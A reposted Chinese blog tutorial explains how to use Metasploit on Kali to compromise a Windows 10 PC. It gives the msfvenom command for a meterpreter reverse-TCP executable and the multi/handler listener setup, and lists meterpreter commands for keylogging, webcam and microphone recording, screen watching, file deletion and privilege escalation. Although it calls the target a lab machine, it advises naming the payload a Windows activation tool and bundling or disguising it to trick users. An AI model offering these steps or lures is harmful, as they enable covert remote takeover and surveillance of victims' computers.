您当前的位置:首页 > 电脑百科 > 网络技术 > 网络安全

Kali利用msf渗透Windows电脑(超详细)

时间:2022-06-05 09:48:36  来源:CSDN  作者:HonkerG

前言

最近整理了一些奇安信&华为&深信服大佬的课件资料+大厂面试课题,想要的可以私信自取,无偿赠送给粉丝朋友~

Kali利用msf渗透Windows电脑(超详细)

 

一、什么是msf

msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。

MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。

演示环境

使用Kali 2021.3进行演示操作

目标靶机: Win10专业版

软件:msfvenom、msfconsole(Kali系统内置)

二、渗透流程

1.进入管理员模式

命令: sudo su

解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令

Kali利用msf渗透Windows电脑(超详细)

 


Kali利用msf渗透Windows电脑(超详细)

 

2.生成可执行文件

命令: msfvenom -p
windows/meterpreter/reverse_tcp LHOST=<本地ip> LPORT=<本地端口号> –f exe –o <文件名>.exe

解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址

本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性

文件名可以随便写自己喜欢的名字,比如写Win10激活工具,可能更容易让目标主机上钩

当然MSF也可以用来渗透手机maclinux

Kali利用msf渗透Windows电脑(超详细)

 


Kali利用msf渗透Windows电脑(超详细)

 

接下来运行命令生成文件

Kali利用msf渗透Windows电脑(超详细)

 

默认生成的文件在根目录下

Kali利用msf渗透Windows电脑(超详细)

 

把刚才生成的文件放到目标靶机Win10系统中

3.运行msfconsole命令

命令: msfconsole

Kali利用msf渗透Windows电脑(超详细)

 

4.配置参数

(1)命令: use exploit/multi/handler(选择模块)

(2)命令: set payload
windows/meterpreter/reverse_tcp(选择攻击模块)

(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)

(4)命令: set lport 1111(填写刚才生成文件时的端口号)

(5)命令: show options(查看设置参数)

(6)命令: exploit -z -j(后台执行)

Kali利用msf渗透Windows电脑(超详细)

 


Kali利用msf渗透Windows电脑(超详细)

 

5.在靶机打开可执行文件

Kali利用msf渗透Windows电脑(超详细)

 

我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面

6.查看用户

(1)命令: sessions(查看上钩的用户)
(2)命令: sessions -i 1(选择需要攻击的用户,这里选择第 1 个

Kali利用msf渗透Windows电脑(超详细)

 


Kali利用msf渗透Windows电脑(超详细)

 


Kali利用msf渗透Windows电脑(超详细)

 

三、meterpreter渗透靶机的命令

1.监控靶机电脑屏幕

命令: run vnc -i

Kali利用msf渗透Windows电脑(超详细)

 

2.更多命令

Kali利用msf渗透Windows电脑(超详细)

 

cmd指令:

cat 读取文件内容到屏幕

cd 更改目录

checksum 检索文件的校验和

cp 将源复制到目标

del 删除指定文件

dir 列出文件(ls 的别名)

下载 下载文件或目录

编辑 编辑文件

getlwd 打印本地工作目录

getwd 打印工作目录

lcd 更改本地工作目录

lls 列出本地文件

lpwd 打印本地工作目录

ls 列出文件

mkdir 创建目录

mv 将源移动到目标

pwd 打印工作目录

rm 删除指定文件

rmdir 删除目录

search 搜索文件

show_mount 列出所有挂载点/逻辑驱动器

upload 上传文件或目录

pkill 按名称终止进程

meterpreter命令:

keyscan_start 开始捕获击键(开始键盘记录)

keyscan_dump 转储按键缓冲(下载键盘记录)

keyscan_stop 停止捕获击键(停止键盘记录)

record_mic X秒从默认的麦克风record_mic音频记录(音频录制)

webcam_chat 开始视频聊天(视频,对方会有弹窗)

webcam_list 单摄像头(查看摄像头列表)

webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)

webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)

enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)

getdesktop 得到当前的Meterpreter桌面

reboot 重新启动远程计算机

shutdown 关闭远程计算机

shell 放入系统命令 shell

enumdesktops 列出所有可访问的桌面和窗口站

getdesktop 获取当前的meterpreter桌面

idletime 返回远程用户空闲的秒数

keyboard_send 发送击键

keyevent 发送按键事件

keyscan_dump 转储击键缓冲区

keyscan_start 开始捕获击键

keyscan_stop 停止捕获击键

mouse 发送鼠标事件

screenshare 实时观看远程用户桌面

screenshot 抓取交互式桌面的屏幕截图

setdesktop 更改 Meterpreters 当前桌面

uictl 控制一些用户界面组件

record_mic 从默认麦克风录制音频 X 秒

webcam_chat 开始视频聊天

webcam_list 列出网络摄像头

webcam_snap 从指定的网络摄像头拍摄快照

webcam_stream 播放来自指定网络摄像头的视频流

play 在目标系统上播放波形音频文件 (.wav)

getsystem 尝试将您的权限提升到本地系统的权限

execute -f notepad 打开记事本

Kali利用msf渗透Windows电脑(超详细)

 


Kali利用msf渗透Windows电脑(超详细)

 

————————————————

版权声明:本文为CSDN博主「HonkerG」的原创文章

原文链接:
https://blog.csdn.NET/RFZ_322/article/detAIls/123367668



Tags:Kali   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,不构成投资建议。投资者据此操作,风险自担。如有任何标注错误或版权侵犯请与我们联系,我们将及时更正、删除。
▌相关推荐
你知道什么是Kali Linux吗?
Kali Linux是一个备受赞誉的操作系统,它为网络安全专业人员、渗透测试人员和白帽黑客提供了一个强大而全面的平台。如果您对网络安全领域感兴趣,或者想要了解更多有关渗透测试...【详细内容】
2023-07-25  Search: Kali  点击:(440)  评论:(0)  加入收藏
kali-11身份认证攻击
1、Hydra网络服务密码破解工具,支持30多种常见网络协议或服务的破解,AFP、Cisco AAA认证、FTP、HTTP、POP3/SNMP/SSH/Telnet密码字典路径hydra 192.168.8.128 ssh -l root -p...【详细内容】
2022-10-24  Search: Kali  点击:(431)  评论:(0)  加入收藏
Kali Linux 2022.2 发布,包含 10 个新工具和WSL 改进
Offensive Security发布了Kali Linux 2022.2,这是2022年的第二个版本,具有桌面增强功能,有趣的愚人节屏幕保护程序,WSL GUI改进,终端调整,最重要的是,新的工具!Kali Linux是一个Lin...【详细内容】
2022-10-19  Search: Kali  点击:(680)  评论:(0)  加入收藏
Kali Linux 简单介绍
面向安全领域的LinuxKali Linux 是基于Debian的Linux发行版,目标是提供高级的渗透测试(Penetration Testing)和安全审计(Security Auditing)。Kali包含了数百个工具可以提供...【详细内容】
2022-09-11  Search: Kali  点击:(732)  评论:(0)  加入收藏
kali渗透测试_HTTPS攻击
全站HTTPS已成为潮流趋势 HTTPS的作用C I A(机密性、完整性、可用性)解决的是信息传输过程中数据被篡改窃取密:对称、非对称、单向HTTPS攻击方法降级攻击...【详细内容】
2022-08-31  Search: Kali  点击:(503)  评论:(0)  加入收藏
Win11 使用 WSL2 安装 KaliLinux 并安装图形界面
管理员打开 power shellEnable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linuxdism.exe /online /enable-feature /featurename:Virtua...【详细内容】
2022-08-03  Search: Kali  点击:(1091)  评论:(0)  加入收藏
Kali使用Aircrack-ng进行暴力破解WIFI密码
前言最近整理了一些奇安信&华为&深信服大佬的课件资料+大厂面试课题,想要的可以私信自取,无偿赠送给粉丝朋友~ 一、什么是Aircrack-ngAircrack-ng是一个与802.11标准的无线网...【详细内容】
2022-06-08  Search: Kali  点击:(1506)  评论:(0)  加入收藏
Kali与编程:如何安装KALI LINUX中文拼音输入法?
安装KALI中文拼音输入法Kali安装好后,默认是没有中文拼音输入法的,为此我们需要安装拼音输入法,这里我们推荐Google拼音输入法。1.安装fcitx输入法框架和谷歌拼音输入法apt ins...【详细内容】
2022-06-05  Search: Kali  点击:(482)  评论:(0)  加入收藏
Kali利用msf渗透Windows电脑(超详细)
前言最近整理了一些奇安信&华为&深信服大佬的课件资料+大厂面试课题,想要的可以私信自取,无偿赠送给粉丝朋友~ 一、什么是msfmsfvenom a Metasploit standalone payload gener...【详细内容】
2022-06-05  Search: Kali  点击:(3467)  评论:(0)  加入收藏
Kali Linux 2022.2 发布:增加了一个吓唬人的有趣新功能
Kali Linux 2022.2 是今年的第二次更新,增加了一些有趣的内容。Kali Linux 不是你寻常使用的 Linux 发行版。它是专门为渗透测试和道德黑客学习及实验而量身打造的。在新的 K...【详细内容】
2022-05-19  Search: Kali  点击:(860)  评论:(0)  加入收藏
▌简易百科推荐
网络安全行业的春天何时来?
2023年下半年开始,网络安全从业人员都感受到了网安行业的寒冬,但是其实前奏并不是此刻,只是涉及到大量裁员关乎自身而人人感同身受。从近五年各个网络安全上市公司财报可以发现...【详细内容】
2024-04-11  兰花豆说网络安全    Tags:网络安全   点击:(8)  评论:(0)  加入收藏
数据可视化在网络安全中的关键作用
在当今数字化时代,网络安全已成为各大企业乃至国家安全的重要组成部分。随着网络攻击的日益复杂和隐蔽,传统的网络安全防护措施已难以满足需求,急需新型的解决方案以增强网络防...【详细内容】
2024-03-29  小嵩鼠    Tags:数据可视化   点击:(22)  评论:(0)  加入收藏
AI时代的网络安全:探索AI生成的网络攻击
译者 | 晶颜审校 | 重楼长期以来,网络攻击一直是劳动密集型的,需要经过精心策划并投入大量的人工研究。然而,随着人工智能技术的出现,威胁行为者已经成功利用它们的能力,以非凡的...【详细内容】
2024-03-27    51CTO  Tags:网络安全   点击:(17)  评论:(0)  加入收藏
详解渗透测试和漏洞扫描的开源自动化解决方案
译者 | 刘涛审校 | 重楼目录 什么是渗透测试 规划和侦察 扫描 开发和获得访问权限 维持访问权 报告和控制 什么是漏洞扫描 渗透测试工具 渗透测试的自动化 渗透自动化工作流...【详细内容】
2024-02-27    51CTO  Tags:渗透测试   点击:(38)  评论:(0)  加入收藏
如何保护你的电脑不受黑客攻击
在数字时代,网络安全已经成为每个人必须关注的重要问题。黑客攻击、数据泄露和网络犯罪等事件频频发生,使得我们的个人隐私和财产安全面临严重威胁。那么,如何保护你的电脑不受...【详细内容】
2024-02-04  佳慧慧    Tags:黑客攻击   点击:(56)  评论:(0)  加入收藏
2024年需要高度关注的六大网络安全威胁
译者 | 晶颜审校 | 重楼创新技术(如生成式人工智能、无代码应用程序、自动化和物联网)的兴起和迅速采用,极大地改变了每个行业的全球网络安全和合规格局。网络犯罪分子正在转向...【详细内容】
2024-01-03    51CTO  Tags:网络安全威胁   点击:(113)  评论:(0)  加入收藏
终端设备通信网络安全防护方案
终端设备的网络安全是一个综合性问题,需要用户、组织和厂商共同努力,采取一系列的措施来保护终端设备的安全。终端设备网络安全防护方案主要包括以下几个方面:1. 强化用户身份...【详细内容】
2024-01-01  若水叁仟    Tags:网络安全   点击:(59)  评论:(0)  加入收藏
深入解析802.1X认证:网络安全的守护者
802.1X认证,对于很多人来说,可能只是一个陌生的技术名词。然而,在网络安全的领域中,它却扮演着守护者的角色。今天,我们就来深入解析802.1X认证,看看它是如何保护我们的网络安全的...【详细内容】
2023-12-31  韦希喜    Tags:网络安全   点击:(72)  评论:(0)  加入收藏
提升网络安全:ADSelfService Plus多重身份验证的关键
在当今数字化的时代,网络安全问题愈发突出,企业和组织面临着日益严峻的挑战。为了应对不断进化的网络威胁,越来越多的组织开始采用多层次的安全措施,其中多重身份验证成为了关键...【详细内容】
2023-12-27  运维有小邓    Tags:网络安全   点击:(88)  评论:(0)  加入收藏
企业如何应对网络钓鱼攻击的激增?
随着我们进入数字时代,网络犯罪的威胁继续以惊人的速度增长。在最流行的网络犯罪形式中,网络钓鱼仅在过去一年就出现了472%的攻击激增。企业在保护自己及其客户免受网络钓鱼诈...【详细内容】
2023-12-19    千家网  Tags:钓鱼攻击   点击:(90)  评论:(0)  加入收藏
站内最新
站内热门
站内头条